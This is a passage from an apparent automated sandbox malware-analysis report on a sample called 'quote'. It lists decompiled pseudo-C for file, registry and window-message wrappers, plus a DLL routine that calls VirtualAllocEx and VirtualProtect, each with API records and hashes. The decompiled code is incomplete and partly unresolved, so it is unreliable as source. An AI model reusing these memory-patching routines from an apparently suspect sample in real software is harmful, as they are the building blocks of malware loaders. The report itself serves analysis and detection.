                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction ID: 1e5fcd6d8aa83e7c3539c134ce858d200345c8ad9b438ef6e258ac5dd368824a
                                                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                      • Instruction Fuzzy Hash: 27C04C71204541EEE6505B20AE09B177A909B50751F26843A6147F01A0DA388455E93D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 28%
                                                                                      			E6F492AF8(intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				void* _t28;
                                                                                      				void* _t29;
                                                                                      				void* _t33;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      				void* _t45;
                                                                                      				void* _t49;
                                                                                      				signed int _t56;
                                                                                      				void* _t61;
                                                                                      				void* _t69;
                                                                                      				intOrPtr _t70;
                                                                                      				signed int _t75;
                                                                                      				intOrPtr _t77;
                                                                                      				intOrPtr _t78;
                                                                                      				void* _t79;
                                                                                      				void* _t85;
                                                                                      				void* _t86;
                                                                                      				void* _t87;
                                                                                      				void* _t88;
                                                                                      				intOrPtr _t91;
                                                                                      				intOrPtr _t92;
                                                                                      
                                                                                      				if( *0x6f495050 != 0 && E6F492A3B(_a4) == 0) {
                                                                                      					 *0x6f495054 = _t91;
                                                                                      					if( *0x6f49504c != 0) {
                                                                                      						_t91 =  *0x6f49504c;
                                                                                      					} else {
                                                                                      						E6F492A35();
                                                                                      						L6F493020();
                                                                                      						 *0x6f49504c = _t91;
                                                                                      					}
                                                                                      				}
                                                                                      				_t28 = E6F492A69(_a4);
                                                                                      				_t92 = _t91 + 4;
                                                                                      				if(_t28 <= 0) {
                                                                                      					L9:
                                                                                      					_t29 = E6F492A5D();
                                                                                      					_t70 = _a4;
                                                                                      					_t77 =  *0x6f495058;
                                                                                      					 *((intOrPtr*)(_t29 + _t70)) = _t77;
                                                                                      					 *0x6f495058 = _t70;
                                                                                      					E6F492A57();
                                                                                      					_t33 = VirtualAllocEx(??, ??, ??, ??, ??); // executed
                                                                                      					 *0x6f495034 = _t33;
                                                                                      					 *0x6f495038 = _t77;
                                                                                      					if( *0x6f495050 != 0 && E6F492A3B( *0x6f495058) == 0) {
                                                                                      						 *0x6f49504c = _t92;
                                                                                      						_t92 =  *0x6f495054;
                                                                                      					}
                                                                                      					_t78 =  *0x6f495058;
                                                                                      					_a4 = _t78;
                                                                                      					 *0x6f495058 =  *((intOrPtr*)(E6F492A5D() + _t78));
                                                                                      					_t37 = E6F492A49(_t78);
                                                                                      					_pop(_t79);
                                                                                      					if(_t37 != 0) {
                                                                                      						_t40 = E6F492A69(_t79);
                                                                                      						if(_t40 > 0) {
                                                                                      							_push(_t40);
                                                                                      							_push(E6F492A74() + _a4 + _v8);
                                                                                      							_push(E6F492A7E());
                                                                                      							if( *0x6f495050 <= 0 || E6F492A3B(_a4) != 0) {
                                                                                      								_pop(_t86);
                                                                                      								_pop(_t45);
                                                                                      								__eflags =  *((intOrPtr*)(_t86 + _t45)) - 2;
                                                                                      								if(__eflags == 0) {
                                                                                      								}
                                                                                      								asm("loop 0xfffffff5");
                                                                                      							} else {
                                                                                      								_pop(_t87);
                                                                                      								_pop(_t49);
                                                                                      								 *0x6f49504c =  *0x6f49504c +  *(_t87 + _t49) * 4;
                                                                                      								asm("loop 0xffffffeb");
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_t105 =  *0x6f495058;
                                                                                      					if( *0x6f495058 == 0) {
                                                                                      						 *0x6f49504c = 0;
                                                                                      					}
                                                                                      					E6F492AA2(_t105, _a4,  *0x6f495034,  *0x6f495038);
                                                                                      					return _a4;
                                                                                      				}
                                                                                      				_push(E6F492A74() + _a4);
                                                                                      				_t56 = E6F492A7A();
                                                                                      				_v8 = _t56;
                                                                                      				_t75 = _t28;
                                                                                      				_push(_t67 + _t56 * _t75);
                                                                                      				_t69 = E6F492A86();
                                                                                      				_t85 = E6F492A82();
                                                                                      				_t88 = E6F492A7E();
                                                                                      				_t61 = _t75;
                                                                                      				if( *((intOrPtr*)(_t88 + _t61)) == 2) {
                                                                                      					_push( *((intOrPtr*)(_t69 + _t61)));
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t85 + _t61)));
                                                                                      				asm("loop 0xfffffff1");
                                                                                      				goto L9;
                                                                                      			}

























                                                                                      0x6f492b08
                                                                                      0x6f492b19
                                                                                      0x6f492b26
                                                                                      0x6f492b3a
                                                                                      0x6f492b28
                                                                                      0x6f492b28
                                                                                      0x6f492b2d
                                                                                      0x6f492b32
                                                                                      0x6f492b32
                                                                                      0x6f492b26
                                                                                      0x6f492b43
                                                                                      0x6f492b48
                                                                                      0x6f492b4e
                                                                                      0x6f492b92
                                                                                      0x6f492b92
                                                                                      0x6f492b97
                                                                                      0x6f492b9c
                                                                                      0x6f492ba2
                                                                                      0x6f492ba4
                                                                                      0x6f492baa
                                                                                      0x6f492bb7
                                                                                      0x6f492bb9
                                                                                      0x6f492bbe
                                                                                      0x6f492bcb
                                                                                      0x6f492bde
                                                                                      0x6f492be4
                                                                                      0x6f492bea
                                                                                      0x6f492beb
                                                                                      0x6f492bf1
                                                                                      0x6f492bfd
                                                                                      0x6f492c03
                                                                                      0x6f492c0b
                                                                                      0x6f492c0c
                                                                                      0x6f492c0f
                                                                                      0x6f492c1a
                                                                                      0x6f492c1c
                                                                                      0x6f492c28
                                                                                      0x6f492c2e
                                                                                      0x6f492c36
                                                                                      0x6f492c62
                                                                                      0x6f492c63
                                                                                      0x6f492c65
                                                                                      0x6f492c69
                                                                                      0x6f492c69
                                                                                      0x6f492c70
                                                                                      0x6f492c46
                                                                                      0x6f492c46
                                                                                      0x6f492c47
                                                                                      0x6f492c55
                                                                                      0x6f492c5e
                                                                                      0x6f492c5e
                                                                                      0x6f492c36
                                                                                      0x6f492c1a
                                                                                      0x6f492c72
                                                                                      0x6f492c79
                                                                                      0x6f492c7b
                                                                                      0x6f492c7b
                                                                                      0x6f492c94
                                                                                      0x6f492ca2
                                                                                      0x6f492ca2
                                                                                      0x6f492b59
                                                                                      0x6f492b5a
                                                                                      0x6f492b5f
                                                                                      0x6f492b63
                                                                                      0x6f492b68
                                                                                      0x6f492b7c
                                                                                      0x6f492b7d
                                                                                      0x6f492b7e
                                                                                      0x6f492b80
                                                                                      0x6f492b85
                                                                                      0x6f492b87
                                                                                      0x6f492b87
                                                                                      0x6f492b8a
                                                                                      0x6f492b90
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(00000000), ref: 6F492BB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 0e74905853e5c6c349c09d6365ff23ec4f2a44e2048ae3ff917cce5452d50d04
                                                                                      • Instruction ID: 997a79b767e2e66883224573786220b1a636c6b62825307e8857d8d8eb53f91f
                                                                                      • Opcode Fuzzy Hash: 0e74905853e5c6c349c09d6365ff23ec4f2a44e2048ae3ff917cce5452d50d04
                                                                                      • Instruction Fuzzy Hash: 34419072B00704DBDB20EF69D985F593FE5EB56329F304429E4048AA50DB35A661CBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 33%
                                                                                      			E00402889(intOrPtr __edx, void* __eflags) {
                                                                                      				long _t8;
                                                                                      				long _t10;
                                                                                      				LONG* _t12;
                                                                                      				void* _t14;
                                                                                      				intOrPtr _t15;
                                                                                      				void* _t16;
                                                                                      				void* _t19;
                                                                                      
                                                                                      				_t15 = __edx;
                                                                                      				_pop(ds);
                                                                                      				if(__eflags != 0) {
                                                                                      					_t8 = E00402D1C(2);
                                                                                      					_pop(_t14);
                                                                                      					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                                                      					_t10 = SetFilePointer(E00406371(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                                                      					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                                                      						_push(_t10);
                                                                                      						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                                      						E00406358();
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t19 - 4));
                                                                                      				return 0;
                                                                                      			}










                                                                                      0x00402889
                                                                                      0x00402889
                                                                                      0x0040288a
                                                                                      0x00402892
                                                                                      0x00402897
                                                                                      0x00402898
                                                                                      0x004028a7
                                                                                      0x004028b0
                                                                                      0x00402b04
                                                                                      0x00402b05
                                                                                      0x00402b08
                                                                                      0x00402b08
                                                                                      0x004028b0
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028A7
                                                                                        • Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      • Opcode ID: d2438a08b7c9fc040b735ab31b03e2bcc427b44c184fb3c3378e52d46f067a51
                                                                                      • Instruction ID: 502f0b54707076618778017ed9f863131a4a90ead78825dffa4163e62336b453
                                                                                      • Opcode Fuzzy Hash: d2438a08b7c9fc040b735ab31b03e2bcc427b44c184fb3c3378e52d46f067a51
                                                                                      • Instruction Fuzzy Hash: 7FE0ED72A10104AEDB01EFA5AA89CBE7379EB54318B24443BF511B10D1C6B95D519A2A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004062AC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E00406203(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}






                                                                                      0x004062b6
                                                                                      0x004062bf
                                                                                      0x004062d5
                                                                                      0x00000000
                                                                                      0x004062d5
                                                                                      0x004062c3
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402DEF,00000000,?,?), ref: 004062D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                      • Instruction ID: 3317d7e482e8079663a6db4a97809581e22c1b07b88153a27e00a08cc0e2c803
                                                                                      • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                      • Instruction Fuzzy Hash: 52E0ECB2020109BEEF19AF90DD1ADBB371DEB04350F01492EF916E4091E6B5A930AA74
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405F8A(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x00405f8e
                                                                                      0x00405f9e
                                                                                      0x00405fa6
                                                                                      0x00000000
                                                                                      0x00405fad
                                                                                      0x00000000
                                                                                      0x00405faf

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction ID: f93b0abb86e743badb4163669300e0f642a0e5fa5e5e92c65fa389833edf0ca2
                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction Fuzzy Hash: D7E08C3220121AEBEF11AE618C04EEBBB6CFF01360F004832F910E6240D238E8218BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405FB9(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x00405fbd
                                                                                      0x00405fcd
                                                                                      0x00405fd5
                                                                                      0x00000000
                                                                                      0x00405fdc
                                                                                      0x00000000
                                                                                      0x00405fde

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403430,000000FF,0041EA20,?,0041EA20,?,?,00000004,00000000), ref: 00405FCD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction ID: c6b158df49e6f5968e08b93a39371abef257cf80c9060b8b5a86bf4d0676d75d
                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction Fuzzy Hash: 1FE0EC3225065AABDF109E669C04EEB7B6CEB053A0F004837FA55E3190D635E821DBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                      
                                                                                      				 *0x6f495048 = _a4;
                                                                                      				if(_a8 == 1) {
                                                                                      					VirtualProtect(0x6f49505c, 4, 0x40, 0x6f49504c); // executed
                                                                                      					 *0x6f49505c = 0xc2;
                                                                                      					 *0x6f49504c = 0;
                                                                                      					 *0x6f495054 = 0;
                                                                                      					 *0x6f495068 = 0;
                                                                                      					 *0x6f495058 = 0;
                                                                                      					 *0x6f495050 = 0;
                                                                                      					 *0x6f495060 = 0;
                                                                                      					 *0x6f49505e = 0;
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}



                                                                                      0x6f4929e8
                                                                                      0x6f4929ed
                                                                                      0x6f4929fd
                                                                                      0x6f492a05
                                                                                      0x6f492a0c
                                                                                      0x6f492a11
                                                                                      0x6f492a16
                                                                                      0x6f492a1b
                                                                                      0x6f492a20
                                                                                      0x6f492a25
                                                                                      0x6f492a2a
                                                                                      0x6f492a2a
                                                                                      0x6f492a32

                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(6F49505C,00000004,00000040,6F49504C), ref: 6F4929FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1343531538.000000006F491000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F490000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1343473966.000000006F490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343609504.000000006F494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1343646469.000000006F496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6f490000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: b2e09d3b88a2329947c01e5ff3dd18966cf0db5b9cbc2dc845c2457097abda7e
                                                                                      • Instruction ID: f8f66a8f674a18881b1a1ed303df95346ef8ec888ffc78fb8c0d471d2fb41632
                                                                                      • Opcode Fuzzy Hash: b2e09d3b88a2329947c01e5ff3dd18966cf0db5b9cbc2dc845c2457097abda7e
                                                                                      • Instruction Fuzzy Hash: 47F0C9B0705B80DECB50EF3E8445B093FE0B72B367B30452AE148D6E41E3364065DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040627E(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E00406203(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}






                                                                                      0x00406288
                                                                                      0x0040628f
                                                                                      0x004062a2
                                                                                      0x00000000
                                                                                      0x004062a2
                                                                                      0x00406293
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040630C,?,00000000,?,?,Call,?), ref: 004062A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                      • Instruction ID: 30c71471ac55a0486040fafebf39dce1c160f5eedd86b0188f7d98683811911a
                                                                                      • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                      • Instruction Fuzzy Hash: 45D0123254020DBBEF11AF90ED01FAB375DAB08351F01442AFE16A4091D775D530A724
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004015A3() {
                                                                                      				int _t5;
                                                                                      				void* _t11;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t5 = SetFileAttributesW(E00402D3E(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                      				_t14 = _t5;
                                                                                      				if(_t14 == 0) {
                                                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x434fa8 =  *0x434fa8 +  *((intOrPtr*)(_t11 - 4));
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x004015ae
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 6dacddc76bbd2e370647182dc3839675bb6107cdcedae3b936a99984db943ce1
                                                                                      • Instruction ID: a93de1ea602b80332484b308aebd2b3b1e31a5c4c7fa674852030dd18b7254c5
                                                                                      • Opcode Fuzzy Hash: 6dacddc76bbd2e370647182dc3839675bb6107cdcedae3b936a99984db943ce1
                                                                                      • Instruction Fuzzy Hash: AAD01772B041049BCB00DFA9AA48A9E73B0EF64328B308537D121F21D0D6F899419A29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004043B3(int _a4) {
                                                                                      				struct HWND__* _t2;
                                                                                      				long _t3;
                                                                                      
                                                                                      				_t2 =  *0x433ed8; // 0x10446
                                                                                      				if(_t2 != 0) {
                                                                                      					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                      					return _t3;
                                                                                      				}
                                                                                      				return _t2;
                                                                                      			}





                                                                                      0x004043b3
                                                                                      0x004043ba
                                                                                      0x004043c5
                                                                                      0x00000000
                                                                                      0x004043c5
                                                                                      0x004043cb

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00010446,00000000,00000000,00000000), ref: 004043C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
